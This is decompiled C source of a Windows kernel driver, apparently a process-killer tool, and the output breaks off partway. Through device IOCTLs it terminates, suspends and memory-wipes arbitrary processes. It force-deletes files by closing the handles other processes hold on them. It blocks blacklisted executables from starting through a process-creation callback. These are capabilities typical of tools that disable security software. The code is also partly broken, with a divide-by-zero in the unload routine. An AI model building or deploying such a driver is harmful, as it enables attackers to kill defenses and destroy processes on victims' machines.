/* This file has been generated by the Hex-Rays decompiler.
Copyright (c) 2007-2017 Hex-Rays <info@hex-rays.com>
Detected compiler: Visual C++
*/
#include <windows.h>
#include <defs.h>
//-------------------------------------------------------------------------
// Function declarations
#define __thiscall __cdecl // Test compile in C mode
char __stdcall sub_401000(const wchar_t **a1);
char __stdcall sub_401050(int a1);
NTSTATUS __stdcall DrvDispatch(int a1, PIRP Irp);
NTSTATUS __stdcall sub_4010C0(PCWSTR SourceString);
char __stdcall sub_401110(const wchar_t **a1);
char __stdcall sub_4011C0(int a1);
NTSTATUS __stdcall DeviceControlDispatch(int a1, PIRP Irp);
NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath);
int __thiscall DrvUnload(void *this, int a2);
signed int __stdcall CheckImageFileName(const wchar_t **a1);
signed int __stdcall sub_4017C0(int a1);
char __stdcall sub_401800(int a1);
char __stdcall Deletefile(PCWSTR SourceString);
NTSTATUS __stdcall sub_401E70(PCWSTR SourceString, PHANDLE FileHandle, ACCESS_MASK DesiredAccess, ULONG ShareAccess);
bool __stdcall CheckImageFileNameStub(int ImageFileName); // idb
bool __stdcall sub_401F30(int a1);
int __stdcall DestroyProcByZeromemory(int a1);
void __stdcall ProcesssCreateNotify(int a1, int a2, int CreateInfo); // idb
int __stdcall ProcessCallBack(int, int); // weak
int RegisterProcessCallbacks();
int RegisterThreadCallbacks();
int __stdcall sub_402330(int, PUNICODE_STRING LinkTarget); // idb
int __stdcall sub_402420(int, PIRP Irp, int); // idb
NTSTATUS __stdcall TerminateProcessById(void *a1);
int __stdcall ThreadCallback(int, int); // weak
int __stdcall IogetcurrentIrpstacklocation(int a1);
int __stdcall sub_402640(int a1);
int __stdcall sub_402670(int a1, int a2, int a3, char a4, unsigned __int8 a5, char a6);
// int __report_rangecheckfailure(void); weak
// int __cdecl stricmp(const char *, const char *);
// wchar_t *__cdecl wcsncpy(wchar_t *Dest, const wchar_t *Source, size_t Count);
// int __cdecl wcsnicmp(const wchar_t *, const wchar_t *, size_t);
// ULONG DbgPrint(PCSTR Format, ...);
// int __stdcall ObQueryNameString(_DWORD, _DWORD, _DWORD, _DWORD); weak
// void *__cdecl memset(void *Dst, int Val, size_t Size);
// _DWORD __cdecl sub_402908(_DWORD, _DWORD, _DWORD); weak
signed int __cdecl sub_402998(int a1, unsigned int a2, int a3, unsigned int *a4);
int __thiscall sub_4029FC(int (__fastcall *this)(_DWORD, _DWORD));
int __thiscall sub_402A14(int (__fastcall *this)(_DWORD, _DWORD));
void __thiscall sub_402A30(PVOID TargetFrame);
int __fastcall sub_402A4C(int a1, int a2, int a3, int a4);
// _DWORD __stdcall _NLG_Notify(_DWORD); weak
// void __stdcall RtlUnwind(PVOID TargetFrame, PVOID TargetIp, PEXCEPTION_RECORD ExceptionRecord, PVOID ReturnValue);
// KIRQL __stdcall KeGetCurrentIrql();
// PKTHREAD __stdcall KeGetCurrentThread();
// void __stdcall RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
// NTSTATUS __stdcall RtlAnsiStringToUnicodeString(PUNICODE_STRING DestinationString, PCANSI_STRING SourceString, BOOLEAN AllocateDestinationString);
// LONG __stdcall RtlCompareUnicodeString(PCUNICODE_STRING String1, PCUNICODE_STRING String2, BOOLEAN CaseInSensitive);
// void __stdcall RtlCopyUnicodeString(PUNICODE_STRING DestinationString, PCUNICODE_STRING SourceString);
// NTSTATUS __stdcall RtlAppendUnicodeStringToString(PUNICODE_STRING Destination, PCUNICODE_STRING Source);
// void __stdcall RtlFreeUnicodeString(PUNICODE_STRING UnicodeString);
// void __stdcall KeInitializeEvent(PRKEVENT Event, EVENT_TYPE Type, BOOLEAN State);
// LONG __stdcall KeSetEvent(PRKEVENT Event, KPRIORITY Increment, BOOLEAN Wait);
// NTSTATUS __stdcall KeWaitForSingleObject(PVOID Object, KWAIT_REASON WaitReason, KPROCESSOR_MODE WaitMode, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
// PVOID __stdcall ExAllocatePoolWithTag(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag);
// void __stdcall ExFreePoolWithTag(PVOID P, ULONG Tag);
// PIRP __stdcall IoAllocateIrp(CCHAR StackSize, BOOLEAN ChargeQuota);
// NTSTATUS __fastcall IofCallDriver(PDEVICE_OBJECT DeviceObject, PIRP Irp);
// void __fastcall IofCompleteRequest(PIRP Irp, CCHAR PriorityBoost);
// NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject, ULONG DeviceExtensionSize, PUNICODE_STRING DeviceName, ULONG DeviceType, ULONG DeviceCharacteristics, BOOLEAN Exclusive, PDEVICE_OBJECT *DeviceObject);
// NTSTATUS __stdcall IoCreateFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG Disposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength, CREATE_FILE_TYPE CreateFileType, PVOID ExtraCreateParameters, ULONG Options);
// NTSTATUS __stdcall IoCreateSymbolicLink(PUNICODE_STRING SymbolicLinkName, PUNICODE_STRING DeviceName);
// void __stdcall IoDeleteDevice(PDEVICE_OBJECT DeviceObject);
// NTSTATUS __stdcall IoDeleteSymbolicLink(PUNICODE_STRING SymbolicLinkName);
// void __stdcall IoFreeIrp(PIRP Irp);
// PDEVICE_OBJECT __stdcall IoGetRelatedDeviceObject(PFILE_OBJECT FileObject);
// NTSTATUS __stdcall ObReferenceObjectByHandle(HANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PVOID *Object, POBJECT_HANDLE_INFORMATION HandleInformation);
// int __stdcall ObRegisterCallbacks(_DWORD, _DWORD); weak
// int __fastcall ObUnRegisterCallbacks(_DWORD, _DWORD, _DWORD); weak
// int __cdecl ObGetFilterVersion(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
// NTSTATUS __stdcall ZwClose(HANDLE Handle);
// NTSTATUS __stdcall ZwOpenSymbolicLinkObject(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
// NTSTATUS __stdcall ZwQuerySymbolicLinkObject(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
// NTSTATUS __stdcall RtlCharToInteger(PCSZ String, ULONG Base, PULONG Value);
// int __stdcall PsSetCreateProcessNotifyRoutineEx(_DWORD, _DWORD); weak
// int __stdcall PsGetProcessId(_DWORD); weak
// NTSTATUS __stdcall ZwTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus);
// NTSTATUS __stdcall ZwOpenProcess(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
// int __stdcall KeAttachProcess(_DWORD); weak
// int KeDetachProcess(void); weak
// int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD); weak
// NTSTATUS __stdcall ZwDeleteFile(POBJECT_ATTRIBUTES ObjectAttributes);
// NTSTATUS __stdcall ZwDuplicateObject(HANDLE SourceProcessHandle, HANDLE SourceHandle, HANDLE TargetProcessHandle, PHANDLE TargetHandle, ACCESS_MASK DesiredAccess, ULONG HandleAttributes, ULONG Options);
// NTSTATUS __stdcall ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, SIZE_T Length, PSIZE_T ResultLength);
// int __stdcall PsSuspendProcess(_DWORD); weak
// int __stdcall PsResumeProcess(_DWORD); weak
// LONG_PTR __fastcall ObfDereferenceObject(PVOID Object);
//-------------------------------------------------------------------------
// Data declarations
_UNKNOWN loc_402A45; // weak
char byte_402A98[2] = { '\0', '\0' }; // weak
const WCHAR SourceString = 92u; // idb
CHAR Format[1] = "\n"; // idb
// extern POBJECT_TYPE *IoFileObjectType;
// extern _UNKNOWN PsProcessType; weak
// extern _UNKNOWN PsThreadType; weak
int dword_404014[] = { 0 }; // weak
int dword_404018[100] =
{
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
}; // idb
int dword_4041A8 = 0; // weak
int dword_4041AC = 0; // weak
int dword_4041B0 = 0; // weak
int dword_4041B4 = 0; // weak
wchar_t word_4041B8[102400] =
{
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
0u,
}; // idb
int dword_4361B8; // weak
//----- (00401000) --------------------------------------------------------
char __stdcall sub_401000(const wchar_t **a1)
{
char result; // al
result = CheckImageFileNameStub((int)a1);
if ( !result )
{
wcsncpy(&word_4041B8[1024 * dword_4041B4], a1[1], *(unsigned __int16 *)a1 / 2);
result = dword_4041B4++ + 1;
}
return result;
}
// 4041B4: using guessed type int dword_4041B4;
//----- (00401050) --------------------------------------------------------
char __stdcall sub_401050(int a1)
{
char result; // al
result = sub_401F30(a1);
if ( !result )
{
result = a1;
dword_404018[dword_4041A8++] = a1;
}
return result;
}
// 4041A8: using guessed type int dword_4041A8;
//----- (00401090) --------------------------------------------------------
NTSTATUS __stdcall DrvDispatch(int a1, PIRP Irp)
{
Irp->IoStatus.Information = 0;
Irp->IoStatus.Status = 0;
IofCompleteRequest(Irp, 0);
return Irp->IoStatus.Status;
}
//----- (004010C0) --------------------------------------------------------
NTSTATUS __stdcall sub_4010C0(PCWSTR SourceString)
{
struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-20h]
LSA_UNICODE_STRING DestinationString; // [esp+18h] [ebp-8h]
RtlInitUnicodeString(&DestinationString, SourceString);
ObjectAttributes.Length = 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.Attributes = 576;
ObjectAttributes.ObjectName = &DestinationString;
ObjectAttributes.SecurityDescriptor = 0;
ObjectAttributes.SecurityQualityOfService = 0;
return ZwDeleteFile(&ObjectAttributes);
}
//----- (00401110) --------------------------------------------------------
char __stdcall sub_401110(const wchar_t **a1)
{
char result; // al
signed int v2; // ST0C_4
result = CheckImageFileNameStub((int)a1);
if ( result )
{
v2 = CheckImageFileName(a1);
memset(&word_4041B8[1024 * v2], 0, 0x400u);
wcsncpy(&word_4041B8[1024 * v2], &word_4041B8[1024 * (dword_4041B4 - 1)], 0x400u);
result = (unsigned int)memset(&word_4041B8[1024 * (dword_4041B4 - 1)], 0, 0x400u);
--dword_4041B4;
}
return result;
}
// 4041B4: using guessed type int dword_4041B4;
//----- (004011C0) --------------------------------------------------------
char __stdcall sub_4011C0(int a1)
{
char result; // al
result = sub_401F30(a1);
if ( result )
{
dword_404018[sub_4017C0(a1)] = dword_404014[dword_4041A8];
result = dword_4041A8-- - 1;
}
return result;
}
// 404014: using guessed type int dword_404014[];
// 4041A8: using guessed type int dword_4041A8;
//----- (00401210) --------------------------------------------------------
NTSTATUS __stdcall DeviceControlDispatch(int a1, PIRP Irp)
{
int v2; // ST10_4
int v3; // ST0C_4
LSA_UNICODE_STRING v5; // [esp+8h] [ebp-88h]
LSA_UNICODE_STRING UnicodeString; // [esp+10h] [ebp-80h]
LSA_UNICODE_STRING DestinationString; // [esp+18h] [ebp-78h]
int v8; // [esp+20h] [ebp-70h]
PCSZ v9; // [esp+24h] [ebp-6Ch]
int v10; // [esp+28h] [ebp-68h]
PCSZ v11; // [esp+2Ch] [ebp-64h]
int v12; // [esp+30h] [ebp-60h]
PCSZ v13; // [esp+34h] [ebp-5Ch]
int v14; // [esp+38h] [ebp-58h]
ULONG v15; // [esp+3Ch] [ebp-54h]
int v16; // [esp+40h] [ebp-50h]
ULONG v17; // [esp+44h] [ebp-4Ch]
ULONG v18; // [esp+48h] [ebp-48h]
ULONG v19; // [esp+4Ch] [ebp-44h]
ULONG v20; // [esp+50h] [ebp-40h]
ULONG Value; // [esp+54h] [ebp-3Ch]
int v22; // [esp+58h] [ebp-38h]
struct _STRING v23; // [esp+5Ch] [ebp-34h]
struct _STRING v24; // [esp+64h] [ebp-2Ch]
struct _STRING SourceString; // [esp+6Ch] [ebp-24h]
_DWORD *Irpsp; // [esp+74h] [ebp-1Ch]
int v27; // [esp+78h] [ebp-18h]
const char *v28; // [esp+7Ch] [ebp-14h]
const char *v29; // [esp+80h] [ebp-10h]
const char *v30; // [esp+84h] [ebp-Ch]
PCSZ String; // [esp+8Ch] [ebp-4h]
Irpsp = (_DWORD *)IogetcurrentIrpstacklocation((int)Irp);
v22 = Irpsp[3];
v2 = Irpsp[2];
v3 = Irpsp[1];
String = (PCSZ)Irp->AssociatedIrp.MasterIrp;
Irp->IoStatus.Information = 0;
Irp->IoStatus.Status = 0;
v27 = v22 - 2278768;
switch ( v22 )
{
case 2278768:
case 2278808:
break;
case 2278772:
RtlCharToInteger(String, 0xAu, &Value);
sub_401050(Value);
break;
case 2278776:
RtlCharToInteger(String, 0xAu, &v20);
sub_4011C0(v20);
break;
case 2278780:
RtlCharToInteger(String, 0xAu, &v19);
TerminateProcessById((void *)v19);
break;
case 2278784:
RtlCharToInteger(String, 0xAu, &v18);
DestroyProcByZeromemory(v18);
break;
case 2278788:
RtlCharToInteger(String, 0xAu, &v17);
PsLookupProcessByProcessId(v17, &v16);
PsSuspendProcess(v16);
break;
case 2278792:
RtlCharToInteger(String, 0xAu, &v15);
PsLookupProcessByProcessId(v15, &v14);
PsResumeProcess(v14);
break;
case 2278796:
SourceString.MaximumLength = 1024;
SourceString.Buffer = (PCHAR)String;
v30 = String;
v13 = String + 1;
v30 += strlen(v30) + 1;
v12 = v30 - (String + 1);
SourceString.Length = (_WORD)v30 - ((_WORD)String + 1);
RtlAnsiStringToUnicodeString(&DestinationString, &SourceString, 1u);
Deletefile(DestinationString.Buffer);
RtlFreeUnicodeString(&DestinationString);
break;
case 2278800:
v24.MaximumLength = 1024;
v24.Buffer = (PCHAR)String;
v29 = String;
v11 = String + 1;
v29 += strlen(v29) + 1;
v10 = v29 - (String + 1);
v24.Length = (_WORD)v29 - ((_WORD)String + 1);
RtlAnsiStringToUnicodeString(&UnicodeString, &v24, 1u);
sub_401000((const wchar_t **)&UnicodeString);
RtlFreeUnicodeString(&UnicodeString);
break;
case 2278804:
v23.MaximumLength = 1024;
v23.Buffer = (PCHAR)String;
v28 = String;
v9 = String + 1;
v28 += strlen(v28) + 1;
v8 = v28 - (String + 1);
v23.Length = (_WORD)v28 - ((_WORD)String + 1);
RtlAnsiStringToUnicodeString(&v5, &v23, 1u);
sub_401110((const wchar_t **)&v5);
RtlFreeUnicodeString(&v5);
break;
case 2278896:
if ( !stricmp(String, "Unload.") )
dword_4361B8 = 1;
break;
default:
Irp->IoStatus.Status = 0xC000000D;
break;
}
IofCompleteRequest(Irp, 0);
return Irp->IoStatus.Status;
}
// 4030A4: using guessed type int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD);
// 4030B8: using guessed type int __stdcall PsSuspendProcess(_DWORD);
// 4030BC: using guessed type int __stdcall PsResumeProcess(_DWORD);
// 4361B8: using guessed type int dword_4361B8;
//----- (004015E0) --------------------------------------------------------
NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
LSA_UNICODE_STRING SymbolicLinkName; // [esp+0h] [ebp-14h]
LSA_UNICODE_STRING DeviceName; // [esp+8h] [ebp-Ch]
PDEVICE_OBJECT DeviceObject; // [esp+10h] [ebp-4h]
DriverObject->DriverUnload = (PDRIVER_UNLOAD)DrvUnload;
*((_DWORD *)DriverObject->DriverSection + 13) |= 0x20u;
RegisterProcessCallbacks();
RegisterThreadCallbacks();
PsSetCreateProcessNotifyRoutineEx(ProcesssCreateNotify, 0);
DeviceName.Length = 30;
DeviceName.MaximumLength = 32;
DeviceName.Buffer = (PWSTR)"\\";
SymbolicLinkName.Length = 38;
SymbolicLinkName.MaximumLength = 40;
SymbolicLinkName.Buffer = (PWSTR)"\\";
IoCreateDevice(DriverObject, 0, &DeviceName, 0x22u, 0, 0, &DeviceObject);
IoCreateSymbolicLink(&SymbolicLinkName, &DeviceName);
DeviceObject->Flags &= 0xFFFFFF7F;
DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)DeviceControlDispatch;
DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)DrvDispatch;
DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)DrvDispatch;
DbgPrint(Format);
return 0;
}
// 40308C: using guessed type int __stdcall PsSetCreateProcessNotifyRoutineEx(_DWORD, _DWORD);
//----- (004016E0) --------------------------------------------------------
int __thiscall DrvUnload(void *this, int a2)
{
int v2; // edx
LSA_UNICODE_STRING SymbolicLinkName; // [esp+0h] [ebp-Ch]
int v5; // [esp+8h] [ebp-4h]
v5 = 0 / dword_4361B8;
ObUnRegisterCallbacks(this, 0 % dword_4361B8, dword_4041AC);
ObUnRegisterCallbacks(dword_4041B0, v2, dword_4041B0);
PsSetCreateProcessNotifyRoutineEx(ProcesssCreateNotify, 1);
SymbolicLinkName.Length = 38;
SymbolicLinkName.MaximumLength = 40;
SymbolicLinkName.Buffer = (PWSTR)"\\";
IoDeleteSymbolicLink(&SymbolicLinkName);
if ( *(_DWORD *)(a2 + 4) )
IoDeleteDevice(*(PDEVICE_OBJECT *)(a2 + 4));
return 0;
}
// 403074: using guessed type int __fastcall ObUnRegisterCallbacks(_DWORD, _DWORD, _DWORD);
// 40308C: using guessed type int __stdcall PsSetCreateProcessNotifyRoutineEx(_DWORD, _DWORD);
// 4041AC: using guessed type int dword_4041AC;
// 4041B0: using guessed type int dword_4041B0;
// 4361B8: using guessed type int dword_4361B8;
//----- (00401760) --------------------------------------------------------
signed int __stdcall CheckImageFileName(const wchar_t **a1)
{
int i; // [esp+0h] [ebp-4h]
for ( i = 0; i < dword_4041B4; ++i )
{
if ( !wcsnicmp(&word_4041B8[1024 * i], a1[1], *(unsigned __int16 *)a1 / 2) )
return i;
}
return -1;
}
// 4041B4: using guessed type int dword_4041B4;
//----- (004017C0) --------------------------------------------------------
signed int __stdcall sub_4017C0(int a1)
{
int i; // [esp+0h] [ebp-4h]
for ( i = 0; i < dword_4041A8; ++i )
{
if ( dword_404018 == a1 )
return i;
}
return -1;
}
// 4041A8: using guessed type int dword_4041A8;
//----- (00401800) --------------------------------------------------------
char __stdcall sub_401800(int a1)
{
NTSTATUS v1; // eax
LSA_UNICODE_STRING Source; // [esp+0h] [ebp-ACh]
LSA_UNICODE_STRING DestinationString; // [esp+8h] [ebp-A4h]
LSA_UNICODE_STRING v5; // [esp+10h] [ebp-9Ch]
char v6; // [esp+18h] [ebp-94h]
struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+1Ch] [ebp-90h]
int v8; // [esp+34h] [ebp-78h]
int v9; // [esp+38h] [ebp-74h]
int v10; // [esp+3Ch] [ebp-70h]
int v11; // [esp+40h] [ebp-6Ch]
struct _CLIENT_ID ClientId; // [esp+44h] [ebp-68h]
__int16 v13; // [esp+4Ch] [ebp-60h]
__int16 v14; // [esp+4Eh] [ebp-5Eh]
char *v15; // [esp+50h] [ebp-5Ch]
int v16; // [esp+54h] [ebp-58h]
PCWSTR v17; // [esp+58h] [ebp-54h]
LSA_UNICODE_STRING Destination; // [esp+5Ch] [ebp-50h]
HANDLE SourceHandle; // [esp+64h] [ebp-48h]
_DWORD *v20; // [esp+68h] [ebp-44h]
unsigned int v21; // [esp+6Ch] [ebp-40h]
int v22; // [esp+70h] [ebp-3Ch]
HANDLE ProcessHandle; // [esp+74h] [ebp-38h]
LSA_UNICODE_STRING String2; // [esp+78h] [ebp-34h]
PVOID Object; // [esp+80h] [ebp-2Ch]
unsigned int i; // [esp+84h] [ebp-28h]
HANDLE TargetHandle; // [esp+88h] [ebp-24h]
SIZE_T NumberOfBytes; // [esp+8Ch] [ebp-20h]
PVOID P; // [esp+90h] [ebp-1Ch]
PVOID Dst; // [esp+94h] [ebp-18h]
NTSTATUS v31; // [esp+98h] [ebp-14h]
char v32; // [esp+9Fh] [ebp-Dh]
WCHAR SourceString; // [esp+A0h] [ebp-Ch]
__int16 v34; // [esp+A2h] [ebp-Ah]
__int16 v35; // [esp+A4h] [ebp-8h]
Dst = 0;
v21 = 0;
P = 0;
String2.Length = 0;
*(_DWORD *)&String2.MaximumLength = 0;
HIWORD(String2.Buffer) = 0;
v13 = 0;
v14 = 2;
v15 = byte_402A98;
v32 = 0;
for ( NumberOfBytes = 1; ; NumberOfBytes *= 2 )
{
Dst = ExAllocatePoolWithTag(0, NumberOfBytes, 0x46494C45u);
if ( !Dst )
{
if ( P )
{
ExFreePoolWithTag(P, 0);
P = 0;
}
if ( String2.Buffer )
ExFreePoolWithTag(String2.Buffer, 0);
if ( Dst )
{
ExFreePoolWithTag(Dst, 0);
Dst = 0;
}
LOBYTE(v1) = v32;
return v1;
}
memset(Dst, 0, NumberOfBytes);
v31 = ZwQuerySystemInformation(SystemHandleInformation, Dst, NumberOfBytes, 0);
if ( v31 >= 0 )
break;
if ( v31 != 0xC0000004 )
{
if ( P )
{
ExFreePoolWithTag(P, 0);
P = 0;
}
if ( String2.Buffer )
ExFreePoolWithTag(String2.Buffer, 0);
if ( Dst )
{
ExFreePoolWithTag(Dst, 0);
Dst = 0;
}
LOBYTE(v1) = v32;
return v1;
}
ExFreePoolWithTag(Dst, 0);
Dst = 0;
}
v20 = Dst;
v21 = *(_DWORD *)Dst;
SourceString = *(_WORD *)(a1 + 8);
v34 = *(_WORD *)(a1 + 10);
v22 = 4;
v35 = 0;
Destination.Buffer = (PWSTR)ExAllocatePoolWithTag(0, 0x104u, 0x4131u);
Destination.MaximumLength = 256;
RtlInitUnicodeString(&DestinationString, &SourceString);
RtlInitUnicodeString(&v5, &::SourceString);
RtlCopyUnicodeString(&Destination, &v5);
v31 = RtlAppendUnicodeStringToString(&Destination, &DestinationString);
if ( v31 >= 0 )
{
sub_402330((int)&Destination, &String2);
RtlFreeUnicodeString(&Destination);
v17 = (PCWSTR)(a1 + 12);
RtlInitUnicodeString(&Source, (PCWSTR)(a1 + 12));
LOBYTE(v1) = RtlAppendUnicodeStringToString(&String2, &Source);
if ( v31 >= 0 )
{
for ( i = 0; i < v21; ++i )
{
v8 = v20[4 * i + 1];
v9 = v20[4 * i + 2];
v10 = v20[4 * i + 3];
v11 = v20[4 * i + 4];
v16 = (unsigned __int16)v8;
ClientId.UniqueProcess = (HANDLE)(unsigned __int16)v8;
ClientId.UniqueThread = 0;
SourceHandle = (HANDLE)HIWORD(v9);
ObjectAttributes.Length = 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.Attributes = 0;
ObjectAttributes.ObjectName = 0;
ObjectAttributes.SecurityDescriptor = 0;
ObjectAttributes.SecurityQualityOfService = 0;
v1 = ZwOpenProcess(&ProcessHandle, 0x40u, &ObjectAttributes, &ClientId);
v31 = v1;
if ( v1 >= 0 )
{
v1 = ZwDuplicateObject(ProcessHandle, SourceHandle, (HANDLE)0xFFFFFFFF, &TargetHandle, 0x1FFFFFu, 0, 2u);
v31 = v1;
if ( v1 >= 0 )
{
v1 = ObReferenceObjectByHandle(TargetHandle, 3u, 0, 0, &Object, 0);
v31 = v1;
if ( v1 >= 0 )
{
P = ExAllocatePoolWithTag(0, 0x808u, 0x4131u);
v31 = ObQueryNameString(Object, P, 2056, &v6);
if ( v31 )
{
LOBYTE(v1) = ObfDereferenceObject(Object);
}
else
{
if ( !RtlCompareUnicodeString((PCUNICODE_STRING)P, &String2, 1u) )
{
ObfDereferenceObject(Object);
ZwClose(TargetHandle);
v31 = ZwDuplicateObject(
ProcessHandle,
SourceHandle,
(HANDLE)0xFFFFFFFF,
&TargetHandle,
0x1FFFFFu,
0,
3u);
if ( v31 >= 0 )
{
ZwClose(TargetHandle);
v32 = 1;
LOBYTE(v1) = 1;
}
else
{
LOBYTE(v1) = 0;
}
return v1;
}
ExFreePoolWithTag(P, 0);
P = 0;
ObfDereferenceObject(Object);
ZwClose(TargetHandle);
LOBYTE(v1) = ZwClose(ProcessHandle);
}
}
}
}
}
}
else
{
LOBYTE(v1) = 0;
}
}
else
{
LOBYTE(v1) = 0;
}
return v1;
}
// 402746: using guessed type int __report_rangecheckfailure(void);
// 402774: using guessed type int __stdcall ObQueryNameString(_DWORD, _DWORD, _DWORD, _DWORD);
//----- (00401CA0) --------------------------------------------------------
char __stdcall Deletefile(PCWSTR SourceString)
{
char result; // al
struct _KEVENT Event; // [esp+0h] [ebp-38h]
char v3; // [esp+10h] [ebp-28h]
PDEVICE_OBJECT DeviceObject; // [esp+18h] [ebp-20h]
_DWORD *v5; // [esp+1Ch] [ebp-1Ch]
HANDLE Handle; // [esp+20h] [ebp-18h]
NTSTATUS v7; // [esp+24h] [ebp-14h]
int v8; // [esp+28h] [ebp-10h]
PVOID Object; // [esp+2Ch] [ebp-Ch]
PIRP Irp; // [esp+30h] [ebp-8h]
char v11; // [esp+37h] [ebp-1h]
v7 = 0;
v7 = sub_401E70(SourceString, &Handle, 0x10080u, 4u);
sub_401800((int)SourceString);
sub_4010C0(SourceString);
v7 = ObReferenceObjectByHandle(Handle, 0x10000u, (POBJECT_TYPE)IoFileObjectType, 0, &Object, 0);
if ( v7 >= 0 )
{
DeviceObject = IoGetRelatedDeviceObject((PFILE_OBJECT)Object);
Irp = IoAllocateIrp(DeviceObject->StackSize, 1u);
if ( Irp )
{
KeInitializeEvent(&Event, SynchronizationEvent, 0);
v11 = 1;
Irp->AssociatedIrp.IrpCount = (LONG)&v11;
Irp->UserEvent = &Event;
Irp->UserIosb = (PIO_STATUS_BLOCK)&v3;
Irp->Tail.Overlay.OriginalFileObject = (PFILE_OBJECT)Object;
Irp->Tail.Overlay.Thread = KeGetCurrentThread();
Irp->RequestorMode = 0;
v8 = sub_402640((int)Irp);
*(_BYTE *)v8 = 6;
*(_DWORD *)(v8 + 20) = DeviceObject;
*(_DWORD *)(v8 + 24) = Object;
*(_DWORD *)(v8 + 4) = 1;
*(_DWORD *)(v8 + 8) = 13;
*(_DWORD *)(v8 + 12) = Object;
sub_402670((int)Irp, (int)sub_402420, (int)&Event, 1, 1u, 1);
v5 = (_DWORD *)*((_DWORD *)Object + 5);
if ( v5 )
{
v5[2] = 0;
*v5 = 0;
}
v7 = IofCallDriver(DeviceObject, Irp);
if ( v7 >= 0 )
{
KeWaitForSingleObject(&Event, 0, 0, 1u, 0);
ObfDereferenceObject(Object);
ZwClose(Handle);
result = 1;
}
else
{
ObfDereferenceObject(Object);
ZwClose(Handle);
result = 0;
}
}
else
{
ObfDereferenceObject(Object);
ZwClose(Handle);
result = 0;
}
}
else
{
ZwClose(Handle);
result = 0;
}
return result;
}
//----- (00401E70) --------------------------------------------------------
NTSTATUS __stdcall sub_401E70(PCWSTR SourceString, PHANDLE FileHandle, ACCESS_MASK DesiredAccess, ULONG ShareAccess)
{
struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-2Ch]
struct _IO_STATUS_BLOCK IoStatusBlock; // [esp+18h] [ebp-14h]
LSA_UNICODE_STRING DestinationString; // [esp+20h] [ebp-Ch]
if ( (signed int)KeGetCurrentIrql() > 0 )
return 0;
RtlInitUnicodeString(&DestinationString, SourceString);
ObjectAttributes.Length = 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.Attributes = 576;
ObjectAttributes.ObjectName = &DestinationString;
ObjectAttributes.SecurityDescriptor = 0;
ObjectAttributes.SecurityQualityOfService = 0;
return IoCreateFile(
FileHandle,
DesiredAccess,
&ObjectAttributes,
&IoStatusBlock,
0,
0x80u,
ShareAccess,
1u,
0,
0,
0,
0,
0,
0x100u);
}
//----- (00401F00) --------------------------------------------------------
bool __stdcall CheckImageFileNameStub(int ImageFileName)
{
return CheckImageFileName((const wchar_t **)ImageFileName) >= 0;
}
//----- (00401F30) --------------------------------------------------------
bool __stdcall sub_401F30(int a1)
{
return sub_4017C0(a1) >= 0;
}
//----- (00401F70) --------------------------------------------------------
int __stdcall DestroyProcByZeromemory(int a1)
{
int v2; // [esp+10h] [ebp-20h]
void *Dst; // [esp+14h] [ebp-1Ch]
CPPEH_RECORD ms_exc; // [esp+18h] [ebp-18h]
PsLookupProcessByProcessId(a1, &v2);
KeAttachProcess(v2);
for ( Dst = (void *)0x10000; (unsigned int)Dst < 0x20000000; Dst = (char *)Dst + 4096 )
{
memset(Dst, 0, 0x1000u);
ms_exc.registration.TryLevel = -2;
}
return KeDetachProcess();
}
// 40309C: using guessed type int __stdcall KeAttachProcess(_DWORD);
// 4030A0: using guessed type int KeDetachProcess(void);
// 4030A4: using guessed type int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD);
//----- (00402030) --------------------------------------------------------
void __stdcall ProcesssCreateNotifyEx(int a1, int a2, int CreateInfo)
{
if ( CreateInfo )
{
if ( CheckImageFileNameStub(*(_DWORD *)(CreateInfo + 0x18)) )
*(_DWORD *)(CreateInfo + 32) = 0xC0000022;
}
}
//----- (00402060) --------------------------------------------------------
